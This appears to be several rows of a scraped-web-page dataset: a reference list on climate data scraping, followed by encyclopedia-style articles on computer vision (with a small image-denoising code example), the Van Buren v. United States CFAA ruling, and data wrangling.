McPherson, J. 2015. Package 'shiny'. See http://citeseerx.ist.psu.edu/viewdoc/download. Dowle, M, Srinivasan, A, Gorecki, J, Chirico, M, Stetsenko, P, Short, T, Lianoglou, S, Antonyan, E, Bonsch, M, Parsonage, H, et al. 2019. Package 'data.table'. Extension of 'data.frame'. Dreyer, A and Stockton, J. 2013. Internet “data scraping”: A primer for counseling clients. New York Law Journal, 7: 1–3. Fundel, VJ, Fleischhut, N, Herzog, SM, Göber, M and Hagedorn, R. 2019. Promoting the use of probabilistic weather forecasts through a dialogue between scientists, developers and end-users. Quarterly Journal of the Royal Meteorological Society, 145: 210–231. DOI: https://doi.org/10.1002/qj.3482 Gibert, K, Izquierdo, J, Sànchez-Marrè, M, Hamilton, SH, Rodríguez-Roda, I and Holmes, G. 2018. Which method to use? An assessment of data mining methods in Environmental Data Science. Environmental Modelling & Software, 110: 3–27. Special Issue on Environmental Data Science: Applications to Air quality and Water cycle. DOI: https://doi.org/10.1016/j.envsoft.2018.09.021 Graul, C and Graul, MC. 2016. Package 'leafletR'. Hadley, W and Garrett, G. 2016. 
R for data science: import, tidy, transform, visualize, and model data. O’Reilly Media, Inc. Helmschrot, J, Muche, G, Hillmann, T, Kanyanga, J, Butale, M, Nascimento, D, Kruger, S, Strohbach, B, Seely, M, Ribeiro, C, et al. 2015. SASSCAL WeatherNet to support regional weather monitoring and climate-related research in Southern Africa. Proceedings of the International Association of Hydrological Sciences, 366: 170–171. DOI: https://doi.org/10.5194/piahs-366-170-2015 Hirschey, JK. 2014. Symbiotic relationships: Pragmatic acceptance of data scraping. Berkeley Tech. LJ, 29: 897. DOI: https://doi.org/10.2139/ssrn.2419167 Ives, B and Krotov, V. 2006. Anything you search can be used against you in a court of law: Data mining in search archives. Communications of the Association for Information Systems, 18(1): 29. DOI: https://doi.org/10.17705/1CAIS.01829 Kaspar, F, Helmschrot, J, Mhanda, A, Butale, M, de Clercq, W, Kanyanga, J, Neto, F, Kruger, S, Castro Matsheka, M, Muche, G, et al. 2015. The SASSCAL contribution to climate observation, climate data management and data rescue in Southern Africa. Advances in Science and Research, 12: 171–177. DOI: https://doi.org/10.5194/asr-12-171-2015 Katz, RW and Murphy, AH. 2005. Economic value of weather and climate forecasts. Cambridge University Press. Krotov, V, Leigh, J and Leiser, S. 2020. Tutorial: Legality and Ethics of Web Scraping. Communications of the Association for Information Systems, 47(1): 22. DOI: https://doi.org/10.17705/1CAIS.04724 Lang, DT and Lang, MDT. 2013. Package 'xml'. Lang, DT and Lang, MDT. 2015. Package 'XML'. Mason, RO. 1986. Four ethical issues of the information age. MIS Quarterly: 5–12. DOI: https://doi.org/10.2307/248873 Molongwane, C, Bopape, M-JM, Fridlind, A, Motshegwa, T, Matsui, T, Phaduli, E, Sehurutshi, B and Maisha, R. 2020. Sensitivity of Botswana Ex-Tropical Cyclone Dineo rainfall simulations to cloud microphysics scheme. AAS Open Research, 3(30): 30. DOI: https://doi.org/10.12688/aasopenres.13062.1 Moses, O. 2017. Heat wave characteristics in the context of climate change over past 50 years in Botswana. Botswana Notes and Records; ub.bw/index.php/bnr. Muche, G, Kruger, S, Hillmann, T, Josenhans, K, Ribeiro, C, Bazibi, M, Seely, M, Nkonde, E, de Clercq, W, Strohbach, B, et al. 2018. SASSCAL WeatherNet: present state, challenges, and achievements of the regional climatic observation network and database. Biodiversity & Ecology, 6: 34–43. DOI: https://doi.org/10.7809/b-e.00302 Munzert, S, Rubba, C, Meissner, P and Nyhuis, D. 2014. Automated data collection with R: A practical guide to web scraping and text mining. John Wiley & Sons. DOI: https://doi.org/10.1002/9781118834732 Nkemelang, T, New, M and Zaroug, M. 2018. Temperature and precipitation extremes under current, 1.5 °C and 2.0 °C global warming above pre-industrial levels over Botswana, and implications for climate change vulnerability. Environmental Research Letters, 13(6): 065016. DOI: https://doi.org/10.1088/1748-9326/aac2f8 Oliver, M and Hambira, WL. 2018. Effects of climate change on evapotranspiration over the Okavango Delta water resources. Physics and Chemistry of the Earth, Parts A/B/C, 105: 98–103. DOI: https://doi.org/10.1016/j.pce.2018.03.011 Robert, S and Paul, S. 2020. Making health economic models Shiny: A tutorial. Wellcome Open Research, 5(69): 69. DOI: https://doi.org/10.12688/wellcomeopenres.15807.2 Schuol, J and Abbaspour, K. 2007. 
Using monthly weather statistics to generate daily data in a SWAT model application to West Africa. Ecological Modelling, 201(3–4): 301–311. DOI: https://doi.org/10.1016/j.ecolmodel.2006.09.028 Singh, J and Singh, O. 2020. Assessing rainfall erosivity and erosivity density over a western Himalayan catchment, India. Journal of Earth System Science, 129(1): 1–22. DOI: https://doi.org/10.1007/s12040-020-1362-8 Sitterson, J, Sinnathamby, S, Parmar, R, Koblich, J, Wolfe, K and Knightes, CD. 2020. Demonstration of an online web services tool incorporating automatic retrieval and comparison of precipitation data. Environmental Modelling & Software, 123: 104570. DOI: https://doi.org/10.1016/j.envsoft.2019.104570 Somses, S, Bopape, M-JM, Ndarana, T, Fridlind, A, Matsui, T, Phaduli, E, Limbo, A, Maikhudumu, S, Maisha, R and Rakate, E. 2020. Convection Parametrization and Multi-Nesting Dependence of a Heavy Rainfall Event over Namibia with Weather Research and Forecasting (WRF) Model. Climate, 8(10): 112. DOI: https://doi.org/10.3390/cli8100112 Thapelo, ST. 2014. Técnicas de aprendizaje automatizado para el pronóstico de temperaturas mínimas en el Centro Meteorológico de Villa Clara, Santa Clara. PhD thesis, Universidad Central “Marta Abreu” de Las Villas. Thapelo, TS and Jamisola, RS. 2019. Machine learning for maximum and minimum temperature analytics and prediction at local level. Tufa, D, Paul, B, Jessica, S, Kinfe, H, Daniel, O, del Corral, J, Cousin, R and Thomson, MC. 2014. Bridging critical gaps in climate services and applications in Africa. Earth Perspectives, 1(1): 15. DOI: https://doi.org/10.1186/2194-6434-1-15 Vanderkam, D, Allaire, J, Owen, J, Gromer, D, Shevtsov, P and Thieurmel, B. 2015. dygraphs: Interface to 'Dygraphs' Interactive Time Series Charting Library. R package version 0.5. Vyacheslav, L, Andrew, R and Samuel, S. 2019. Statistics for climate informatics. Environmetrics, 30(4). DOI: https://doi.org/10.1002/env.2567 Wickham, H. 2011. ggplot2. Wiley Interdisciplinary Reviews: Computational Statistics, 3(2): 180–185. Wickham, H and Wickham, MH. 2016. Package 'rvest'. URL: https://cran.r-project.org/web/packages/rvest/rvest.pdf. DOI: https://doi.org/10.1002/wics.147 Wickham, H and Wickham, MH. 2019. Package 'stringr'. Yang, Y, Wilson, L and Wang, J. 2010. Development of an automated climatic data scraping, filtering and display system. Computers and Electronics in Agriculture, 71(1): 77–87. DOI: https://doi.org/10.1016/j.compag.2009.12.006 |
208 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Computer_vision | Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images,and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g. in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input to the retina in the human analog) into descriptions of the world that make sense to thought processes and can elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. The scientific discipline of computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, multi-dimensional data from a 3D scanner, 3D point clouds from LiDaR sensors, or medical scanning devices. The technological discipline of computer vision seeks to apply its theories and models to the construction of computer vision systems. Sub-domains of computer vision include scene reconstruction, object detection, event detection, activity recognition, video tracking, object recognition, 3D pose estimation, learning, indexing, motion estimation, visual servoing, 3D scene modeling, and image restoration. Adopting computer vision technology might be painstaking for organizations as there is no single-point solution for it. Very few companies provide a unified and distributed platform or Operating System where computer vision applications can be easily deployed and managed. Computer vision is an interdisciplinary field that deals with how computers can be made to gain high-level understanding from digital images or videos. From the perspective of engineering, it seeks to automate tasks that the human visual system can do. 5 6 7 "Computer vision is concerned with the automatic extraction, analysis, and understanding of useful information from a single image or a sequence of images. It involves the development of a theoretical and algorithmic basis to achieve automatic visual understanding. 8 As a scientific discipline, computer vision is concerned with the theory behind artificial systems that extract information from images. The image data can take many forms, such as video sequences, views from multiple cameras, or multi-dimensional data from a medical scanner. 9 As a technological discipline, computer vision seeks to apply its theories and models for the construction of computer vision systems. Machine vision refers to a systems engineering discipline, especially in the context of factory automation. In more recent times, the terms computer vision and machine vision have converged to a greater degree. 10 : 13 In the late 1960s, computer vision began at universities that were pioneering artificial intelligence. It was meant to mimic the human visual system as a stepping stone to endowing robots with intelligent behavior. 11 In 1966, it was believed that this could be achieved through an undergraduate summer project, 12 by attaching a camera to a computer and having it "describe what it saw". 
13 14 What distinguished computer vision from the prevalent field of digital image processing at that time was a desire to extract three-dimensional structure from images with the goal of achieving full scene understanding. Studies in the 1970s formed the early foundations for many of the computer vision algorithms that exist today, including extraction of edges from images, labeling of lines, non-polyhedral and polyhedral modeling, representation of objects as interconnections of smaller structures, optical flow, and motion estimation. 11 The next decade saw studies based on more rigorous mathematical analysis and quantitative aspects of computer vision. These include the concept of scale-space, the inference of shape from various cues such as shading, texture and focus, and contour models known as snakes. Researchers also realized that many of these mathematical concepts could be treated within the same optimization framework as regularization and Markov random fields. 15 By the 1990s, some of the previous research topics became more active than others. Research in projective 3 D reconstructions led to better understanding of camera calibration. With the advent of optimization methods for camera calibration, it was realized that a lot of the ideas were already explored in bundle adjustment theory from the field of photogrammetry. This led to methods for sparse 3 D reconstructions of scenes from multiple images. Progress was made on the dense stereo correspondence problem and further multi-view stereo techniques. At the same time, variations of graph cut were used to solve image segmentation. This decade also marked the first time statistical learning techniques were used in practice to recognize faces in images (see Eigenface). Toward the end of the 1990s, a significant change came about with the increased interaction between the fields of computer graphics and computer vision. This included image-based rendering, image morphing, view interpolation, panoramic image stitching and early light-field rendering. 11 Recent work has seen the resurgence of feature-based methods used in conjunction with machine learning techniques and complex optimization frameworks. 16 17 The advancement of Deep Learning techniques has brought further life to the field of computer vision. The accuracy of deep learning algorithms on several benchmark computer vision data sets for tasks ranging from classification, 18 segmentation and optical flow has surpassed prior methods. citation needed 19 Solid-state physics is another field that is closely related to computer vision. Most computer vision systems rely on image sensors, which detect electromagnetic radiation, which is typically in the form of either visible, infrared or ultraviolet light. The sensors are designed using quantum physics. The process by which light interacts with surfaces is explained using physics. Physics explains the behavior of optics which are a core part of most imaging systems. Sophisticated image sensors even require quantum mechanics to provide a complete understanding of the image formation process. 11 Also, various measurement problems in physics can be addressed using computer vision, for example, motion in fluids. Neurobiology has greatly influenced the development of computer vision algorithms. Over the last century, there has been an extensive study of eyes, neurons, and brain structures devoted to the processing of visual stimuli in both humans and various animals. 
This has led to a coarse yet convoluted description of how natural vision systems operate in order to solve certain vision-related tasks. These results have led to a sub-field within computer vision where artificial systems are designed to mimic the processing and behavior of biological systems at different levels of complexity. Also, some of the learning-based methods developed within computer vision (e.g. neural net and deep learning based image and feature analysis and classification) have their background in neurobiology. The Neocognitron, a neural network developed in the 1970s by Kunihiko Fukushima, is an early example of computer vision taking direct inspiration from neurobiology, specifically the primary visual cortex. Some strands of computer vision research are closely related to the study of biological vision—indeed, just as many strands of AI research are closely tied with research into human intelligence and the use of stored knowledge to interpret, integrate, and utilize visual information. The field of biological vision studies and models the physiological processes behind visual perception in humans and other animals. Computer vision, on the other hand, develops and describes the algorithms implemented in software and hardware behind artificial vision systems. An interdisciplinary exchange between biological and computer vision has proven fruitful for both fields. 21 Yet another field related to computer vision is signal processing. Many methods for processing one-variable signals, typically temporal signals, can be extended in a natural way to the processing of two-variable signals or multi-variable signals in computer vision. However, because of the specific nature of images, there are many methods developed within computer vision that have no counterpart in the processing of one-variable signals. Together with the multi-dimensionality of the signal, this defines a subfield in signal processing as a part of computer vision. Robot navigation sometimes deals with autonomous path planning or deliberation for robotic systems to navigate through an environment. 22 A detailed understanding of these environments is required to navigate through them. Information about the environment could be provided by a computer vision system, acting as a vision sensor and providing high-level information about the environment and the robot Besides the above-mentioned views on computer vision, many of the related research topics can also be studied from a purely mathematical point of view. For example, many methods in computer vision are based on statistics, optimization or geometry. Finally, a significant part of the field is devoted to the implementation aspect of computer vision; how existing methods can be realized in various combinations of software and hardware, or how these methods can be modified in order to gain processing speed without losing too much performance. Computer vision is also used in fashion eCommerce, inventory management, patent search, furniture, and the beauty industry. 23 The fields most closely related to computer vision are image processing, image analysis and machine vision. There is a significant overlap in the range of techniques and applications that these cover. This implies that the basic techniques that are used and developed in these fields are similar, something which can be interpreted as there is only one field with different names. 
On the other hand, it appears to be necessary for research groups, scientific journals, conferences, and companies to present or market themselves as belonging specifically to one of these fields and, hence, various characterizations which distinguish each of the fields from the others have been presented. In image processing, the input is an image and the output is an image as well, whereas in computer vision, an image or a video is taken as an input and the output could be an enhanced image, an understanding of the content of an image or even behavior of a computer system based on such understanding. Computer graphics produces image data from 3D models, and computer vision often produces 3D models from image data. 24 There is also a trend towards a combination of the two disciplines, e.g., as explored in augmented reality. The following characterizations appear relevant but should not be taken as universally accepted: Photogrammetry also overlaps with computer vision, e.g., stereophotogrammetry vs. computer stereo vision. Applications range from tasks such as industrial machine vision systems which, say, inspect bottles speeding by on a production line, to research into artificial intelligence and computers or robots that can comprehend the world around them. The computer vision and machine vision fields have significant overlap. Computer vision covers the core technology of automated image analysis which is used in many fields. Machine vision usually refers to a process of combining automated image analysis with other methods and technologies to provide automated inspection and robot guidance in industrial applications. In many computer-vision applications, computers are pre-programmed to solve a particular task, but methods based on learning are now becoming increasingly common. Examples of applications of computer vision include systems for: One of the most prominent application fields is medical computer vision, or medical image processing, characterized by the extraction of information from image data to diagnose a patient. An example of this is the detection of tumours, arteriosclerosis or other malign changes, and a variety of dental pathologies; measurements of organ dimensions, blood flow, etc. are another example. It also supports medical research by providing new information: e.g., about the structure of the brain or the quality of medical treatments. Applications of computer vision in the medical area also include enhancement of images interpreted by humans—ultrasonic images or X-ray images, for example—to reduce the influence of noise. A second application area in computer vision is in industry, sometimes called machine vision, where information is extracted for the purpose of supporting a production process. One example is quality control where details or final products are being automatically inspected in order to find defects. One of the most prevalent fields for such inspection is the Wafer industry in which every single Wafer is being measured and inspected for inaccuracies or defects to prevent a computer chip from coming to market in an unusable manner. Another example is a measurement of the position and orientation of details to be picked up by a robot arm. Machine vision is also heavily used in the agricultural processes to remove undesirable foodstuff from bulk material, a process called optical sorting. 30 Military applications are probably one of the largest areas of computer vision citation needed . 
The obvious examples are the detection of enemy soldiers or vehicles and missile guidance. More advanced systems for missile guidance send the missile to an area rather than a specific target, and target selection is made when the missile reaches the area based on locally acquired image data. Modern military concepts, such as "battlefield awareness", imply that various sensors, including image sensors, provide a rich set of information about a combat scene that can be used to support strategic decisions. In this case, automatic processing of the data is used to reduce complexity and to fuse information from multiple sensors to increase reliability. One of the newer application areas is autonomous vehicles, which include submersibles, land-based vehicles (small robots with wheels, cars, or trucks), aerial vehicles, and unmanned aerial vehicles (UAV). The level of autonomy ranges from fully autonomous (unmanned) vehicles to vehicles where computer-vision-based systems support a driver or a pilot in various situations. Fully autonomous vehicles typically use computer vision for navigation, e.g., for knowing where they are or mapping their environment (SLAM), for detecting obstacles. It can also be used for detecting certain task-specific events, e.g., a UAV looking for forest fires. Examples of supporting systems are obstacle warning systems in cars, cameras and LiDAR sensors in vehicles, and systems for autonomous landing of aircraft. Several car manufacturers have demonstrated systems for autonomous driving of cars. There are ample examples of military autonomous vehicles ranging from advanced missiles to UAVs for recon missions or missile guidance. Space exploration is already being made with autonomous vehicles using computer vision, e.g., NASA's Curiosity and CNSA's Yutu 2 rover. Materials such as rubber and silicon are being used to create sensors that allow for applications such as detecting microundulations and calibrating robotic hands. Rubber can be used in order to create a mold that can be placed over a finger, inside of this mold would be multiple strain gauges. The finger mold and sensors could then be placed on top of a small sheet of rubber containing an array of rubber pins. A user can then wear the finger mold and trace a surface. A computer can then read the data from the strain gauges and measure if one or more of the pins are being pushed upward. If a pin is being pushed upward then the computer can recognize this as an imperfection in the surface. This sort of technology is useful in order to receive accurate data on imperfections on a very large surface. 31 Another variation of this finger mold sensor are sensors that contain a camera suspended in silicon. The silicon forms a dome around the outside of the camera and embedded in the silicon are point markers that are equally spaced. These cameras can then be placed on devices such as robotic hands in order to allow the computer to receive highly accurate tactile data. 32 Other application areas include: Each of the application areas described above employ a range of computer vision tasks; more or less well-defined measurement problems or processing problems, which can be solved using a variety of methods. Some examples of typical computer vision tasks are presented below. 
Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images, and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g., in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input of the retina) into descriptions of the world that can interface with other thought processes and elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. 37 The classical problem in computer vision, image processing, and machine vision is that of determining whether or not the image data contains some specific object, feature, or activity. Different varieties of recognition problem are described in the literature. 38 Currently, the best algorithms for such tasks are based on convolutional neural networks. An illustration of their capabilities is given by the ImageNet Large Scale Visual Recognition Challenge; this is a benchmark in object classification and detection, with millions of images and 1000 object classes used in the competition. 39 Performance of convolutional neural networks on the ImageNet tests is now close to that of humans. 39 The best algorithms still struggle with objects that are small or thin, such as a small ant on the stem of a flower or a person holding a quill in their hand. They also have trouble with images that have been distorted with filters (an increasingly common phenomenon with modern digital cameras). By contrast, those kinds of images rarely trouble humans. Humans, however, tend to have trouble with other issues. For example, they are not good at classifying objects into fine-grained classes, such as the particular breed of dog or species of bird, whereas convolutional neural networks handle this with ease. citation needed Several specialized tasks based on recognition exist, such as: Several tasks relate to motion estimation, where an image sequence is processed to produce an estimate of the velocity either at each points in the image or in the 3D scene or even of the camera that produces the images. Examples of such tasks are: Given one or (typically) more images of a scene, or a video, scene reconstruction aims at computing a 3D model of the scene. In the simplest case, the model can be a set of 3D points. More sophisticated methods produce a complete 3D surface model. The advent of 3D imaging not requiring motion or scanning, and related processing algorithms is enabling rapid advances in this field. Grid-based 3D sensing can be used to acquire 3D images from multiple angles. Algorithms are now available to stitch multiple 3D images together into point clouds and 3D models. 24 Image restoration comes into the picture when the original image is degraded or damaged due to some external factors like lens wrong positioning, transmission interference, low lighting or motion blurs, etc., which is referred to as noise. When the images are degraded or damaged, the information to be extracted from them also gets damaged. Therefore we need to recover or restore the image as it was intended to be. The aim of image restoration is the removal of noise (sensor noise, motion blur, etc.) from images. The simplest possible approach for noise removal is various types of filters, such as low-pass filters or median filters. 
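As a concrete illustration of the "simplest possible approach" just mentioned, here is a minimal Python sketch of median filtering for impulse (salt-and-pepper) noise. It assumes NumPy and SciPy are available in this notebook's environment and uses a synthetic image, so it is an illustration of the idea rather than anything prescribed by the article.
# Minimal sketch: suppress salt-and-pepper noise with a 3x3 median filter.
import numpy as np
from scipy.ndimage import median_filter

rng = np.random.default_rng(0)
clean = np.zeros((64, 64))
clean[16:48, 16:48] = 1.0                      # a bright square stands in for the scene
noisy = clean.copy()
noisy[rng.random(clean.shape) < 0.05] = 1.0    # salt noise
noisy[rng.random(clean.shape) < 0.05] = 0.0    # pepper noise

restored = median_filter(noisy, size=3)        # median of each 3x3 neighbourhood
print("corrupted pixels before:", int((noisy != clean).sum()),
      "after:", int((np.abs(restored - clean) > 0.5).sum()))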
More sophisticated methods assume a model of how the local image structures look to distinguish them from noise. By first analyzing the image data in terms of the local image structures, such as lines or edges, and then controlling the filtering based on local information from the analysis step, a better level of noise removal is usually obtained compared to the simpler approaches. An example in this field is inpainting. The organization of a computer vision system is highly application-dependent. Some systems are stand-alone applications that solve a specific measurement or detection problem, while others constitute a sub-system of a larger design which, for example, also contains sub-systems for control of mechanical actuators, planning, information databases, man-machine interfaces, etc. The specific implementation of a computer vision system also depends on whether its functionality is pre-specified or if some part of it can be learned or modified during operation. Many functions are unique to the application. There are, however, typical functions that are found in many computer vision systems. Image-understanding systems (IUS) include three levels of abstraction as follows: low level includes image primitives such as edges, texture elements, or regions; intermediate level includes boundaries, surfaces and volumes; and high level includes objects, scenes, or events. Many of these requirements are entirely topics for further research. The representational requirements in the designing of IUS for these levels are: representation of prototypical concepts, concept organization, spatial knowledge, temporal knowledge, scaling, and description by comparison and differentiation. While inference refers to the process of deriving new, not explicitly represented facts from currently known facts, control refers to the process that selects which of the many inference, search, and matching techniques should be applied at a particular stage of processing. Inference and control requirements for IUS are: search and hypothesis activation, matching and hypothesis testing, generation and use of expectations, change and focus of attention, certainty and strength of belief, inference and goal satisfaction. 46 There are many kinds of computer vision systems; however, all of them contain these basic elements: a power source, at least one image acquisition device (camera, ccd, etc.), a processor, and control and communication cables or some kind of wireless interconnection mechanism. In addition, a practical vision system contains software, as well as a display in order to monitor the system. Vision systems for inner spaces, as most industrial ones, contain an illumination system and may be placed in a controlled environment. Furthermore, a completed system includes many accessories, such as camera supports, cables, and connectors. Most computer vision systems use visible-light cameras passively viewing a scene at frame rates of at most 60 frames per second (usually far slower). A few computer vision systems use image-acquisition hardware with active illumination or something other than visible light or both, such as structured-light 3D scanners, thermographic cameras, hyperspectral imagers, radar imaging, lidar scanners, magnetic resonance images, side-scan sonar, synthetic aperture sonar, etc. Such hardware captures "images" that are then processed often using the same computer vision algorithms used to process visible-light images. 
While traditional broadcast and consumer video systems operate at a rate of 30 frames per second, advances in digital signal processing and consumer graphics hardware has made high-speed image acquisition, processing, and display possible for real-time systems on the order of hundreds to thousands of frames per second. For applications in robotics, fast, real-time video systems are critically important and often can simplify the processing needed for certain algorithms. When combined with a high-speed projector, fast image acquisition allows 3D measurement and feature tracking to be realized. 47 Egocentric vision systems are composed of a wearable camera that automatically take pictures from a first-person perspective. As of 2016, vision processing units are emerging as a new class of processors to complement CPUs and graphics processing units (GPUs) in this role. 48 |
209 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Van_Buren_v._United_States | Van Buren v. United States, 593 U.S. (2021), was a United States Supreme Court case dealing with the Computer Fraud and Abuse Act (CFAA) and its definition of "exceeds authorized access" in relation to one intentionally accessing a computer system they have authorization to access. In June 2021, the Supreme Court ruled in a 6 3 opinion that one "exceeds authorized access" by accessing off-limit files and other information on a computer system they were otherwise authorized to access. The CFAA's language had long created a circuit split in case law, and the Court's decision narrowed the applicability of CFAA in prosecuting cybersecurity and computer crime. The Computer Fraud and Abuse Act (CFAA) is a federal law passed in 1986 to strengthen laws around unauthorized access to computer systems. The law was passed partially based on fears from Congress members who saw the 1983 film WarGames. 1 Among its core statutes at 18 U.S.C. 1030(a)(2) is that intentionally accessing a computer system "without authorization or exceeds authorized access" to obtain protected information, financial records, or federal government information is considered a federal crime that can include fines and imprisonment as a penalty. The exact definition of "exceeds authorized access" is not clear and created a 4 3 circuit split of cases at the Circuit Courts. 2 In the First, Fifth, Seventh, and Eleventh Circuits, the courts upheld a broad view of the statement, that accessing a computer with authorization but for an improper purpose is a violation of the CFAA. The Second, Fourth, and Ninth Circuits took a more narrow view that a violation only occurs if the authorized user accesses information they were prohibited from accessing. 2 Because of the case law split, there has been debate on whether the language should be treated narrowly or broadly between cybersecurity researchers and law enforcement among others. For cybersecurity practitioners, a narrow interpretation of "exceeds authorized access" language in 1030(a)(2) would allow them to better conduct work identifying and resolving security problems with computer hardware and software as to make the Internet safer. The vagueness of the statute otherwise puts these job functions at risk. Law enforcement and the U.S. government in general prefer a broader interpretation as this allows them to prosecute those who use hacking to bring down or take advantage of insecure systems under the CFAA. 3 There are additional concerns as the language of CFAA, if broadly interpreted, could apply to commonly-accepted activities at businesses or elsewhere, such as using office computers for browsing the web. Jeffrey L. Fisher, a law professor at Stanford University who represents the petitioner in the present case, states that the law's language is outdated with modern computer usage, and its broad interpretation makes a crime out of ordinary breaches of computer restrictions and terms of service that people likely don’t even know about and if they did would have no reason to think would be a federal crime. 3 Police officer Nathan Van Buren, from Cumming, Georgia, was in need of money and asked a man, Andrew Albo, for help. Albo was known to have connections to prostitution in the town and had prior conflicts with the police. Albo reported this request to the local sheriff's office, where the request was passed to the Federal Bureau of Investigation (FBI). 
The FBI set up a sting operation and instructed Albo to offer Van Buren US$6,000 and, in exchange, to request that Van Buren look up a license plate on the Georgia Crime Information Center (GCIC), which he had authorized access to, to see if its registered owner, a stripper, was an undercover officer. Van Buren complied with the request, which led the FBI to arrest him for felony computer fraud under CFAA 1030(a)(2). Van Buren was found guilty in a jury trial and sentenced to 18 months of prison by the United States District Court for the Northern District of Georgia. 2 Van Buren appealed the conviction to the United States Court of Appeals for the Eleventh Circuit, asserting that accessing the GCIC that he had authorized access to, but for an improper purpose, was not a violation of the "exceeds authorized access" clause of the CFAA. While the Circuit judges had some sympathy for this argument, they chose to rule on precedent from a prior Eleventh Circuit case, United States v. Rodriguez (2010), 4 to uphold Van Buren's conviction. 5 2 Van Buren petitioned the Supreme Court, which granted certiorari in April 2020. 3 The case was argued on November 30, 2020, via telephone due to the COVID-19 pandemic. 6 The Court issued its decision on June 3, 2021. In a 6–3 decision, the Court reversed and remanded the lower court ruling. The majority opinion was written by Justice Amy Coney Barrett, joined by Justices Stephen Breyer, Sonia Sotomayor, Elena Kagan, Neil Gorsuch, and Brett Kavanaugh. Barrett ruled that for the CFAA, a person violates the "exceeds authorized access" language when they access files or other information that is off-limits to them on a computer system that they otherwise have authorized access to. The majority opinion distinguished this from Van Buren's case, in that the information he obtained was within the limits of what he could access with his authorization, but was obtained for improper reasons, and thus he could not be charged under the CFAA for this crime. 7 In the opinion, Barrett agreed with critics of the law that if the Court had taken the government's stance that "the 'exceeds authorized access' clause criminalizes every violation of a computer-use policy", "then millions of otherwise law-abiding citizens are criminals". 8 Justice Clarence Thomas wrote the dissenting opinion, joined by Chief Justice John Roberts and Justice Samuel Alito. Thomas wrote that many parts of federal law denote portions of law where a person may be given temporary access to property but still place limits on what they may do with that access, such as a valet parking a car, and that the majority had taken a contrived position. Thomas wrote, "It is understandable to be uncomfortable with so much conduct being criminalized, but that discomfort does not give us authority to alter statutes". 8 This case is notable for being the first in which Justice Stephen Breyer assigned the majority opinion. Because the Chief Justice and Justice Thomas both dissented, Breyer, who is the second-most senior Associate Justice, was the most senior justice in the majority and so assigned the opinion. Breyer chose to assign this opinion to Justice Barrett, who was the newest justice at the time. 9 The Electronic Frontier Foundation, which had filed an amicus brief in the case stating that "the CFAA has hindered the work of 'security researchers'" and opined that "the government’s broad interpretation of the CFAA" meant that "standard security research practices ... 
can be highly risky", 10 called the ruling "a victory for all Internet users" and "especially good news for security researchers". 11 The following week, on the basis of Van Buren, the Supreme Court vacated via order the Ninth Circuit's decision in hiQ Labs v. LinkedIn (2019), in which hiQ had prevailed in its bid to web scrape data from LinkedIn, which is owned by Microsoft. The Ninth Circuit had relied on an interpretation of the CFAA under which, because LinkedIn's data was publicly available, Microsoft could not stop hiQ from collecting it, even at a massive scale beyond the capabilities of a human. The Supreme Court vacated the ruling and instructed the Ninth Circuit to review the case under the Van Buren decision, which could bring web scraping within the scope of improper acts under the CFAA. 12 |
210 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_wrangling | Data wrangling, sometimes referred to as data munging, is the process of transforming and mapping data from one "raw" data form into another format with the intent of making it more appropriate and valuable for a variety of downstream purposes such as analytics. The goal of data wrangling is to assure quality and useful data. Data analysts typically spend the majority of their time in the process of data wrangling compared to the actual analysis of the data. The process of data wrangling may include further munging, data visualization, data aggregation, training a statistical model, as well as many other potential uses. Data wrangling typically follows a set of general steps which begin with extracting the data in a raw form from the data source, "munging" the raw data (e.g. sorting) or parsing the data into predefined data structures, and finally depositing the resulting content into a data sink for storage and future use. 1 It is closely aligned with the ETL process. The non-technical term "wrangler" is often said to derive from work done by the United States Library of Congress's National Digital Information Infrastructure and Preservation Program (NDIIPP) and their program partner, the Emory University Libraries-based MetaArchive Partnership. The term "mung" has roots in munging as described in the Jargon File. 2 The term "data wrangler" was also suggested as the best analogy to describe someone working with data. 3 One of the first mentions of data wrangling in a scientific context was by Donald Cline during the NASA/NOAA Cold Lands Processes Experiment. 4 Cline stated the data wranglers "coordinate the acquisition of the entire collection of the experiment data". Cline also specifies duties typically handled by a storage administrator for working with large amounts of data. This can occur in areas like major research projects and the making of films with a large amount of complex computer-generated imagery. In research, this involves both data transfer from research instrument to storage grid or storage facility as well as data manipulation for re-analysis via high-performance computing instruments or access via cyberinfrastructure-based digital libraries. With the rise of artificial intelligence in data science, it has become increasingly important for automated data wrangling to have very strict checks and balances, which is why the munging of data has not been fully automated by machine learning. Data munging requires more than just an automated solution; it requires knowledge of what information should be removed, and artificial intelligence has not reached the point of understanding such things. 5 Data wrangling is a superset of data mining and requires processes that some, but not all, data mining uses. The purpose of data mining is to find patterns within large data sets, whereas data wrangling transforms data in order to deliver insights about that data. That data wrangling is a superset of data mining does not mean that data mining does not use it; there are many use cases for data wrangling in data mining. Data wrangling can benefit data mining by removing data that does not benefit the overall set, or is not formatted properly, which will yield better results for the overall data mining process. 
An example of data mining that is closely related to data wrangling is ignoring data from a set that is not connected to the goal: if there is a data set related to the state of Texas and the goal is to get statistics on the residents of Houston, then the data in the set related to the residents of Dallas is not useful and can be removed before processing to improve the efficiency of the data mining process. With an increase in raw data comes an increase in the amount of data that is not inherently useful; this increases the time spent on cleaning and organizing data before it can be analyzed, which is where data wrangling comes into play. The result of data wrangling can provide important metadata statistics for further insights about the data; it is important to ensure that metadata is consistent, as inconsistencies can otherwise cause roadblocks. Data wrangling allows analysts to analyze more complex data more quickly and achieve more accurate results, and because of this, better decisions can be made. Many businesses have moved to data wrangling because of the success that it has brought. The main steps in data wrangling form an iterative process that begins with understanding and familiarizing yourself with your data, and they should yield a clean and usable data set that can then be used for analysis. This process is tedious but rewarding, as it allows analysts to get the information they need out of a large set of data that would otherwise be unreadable. The result of using the data wrangling process on this small data set shows a significantly easier data set 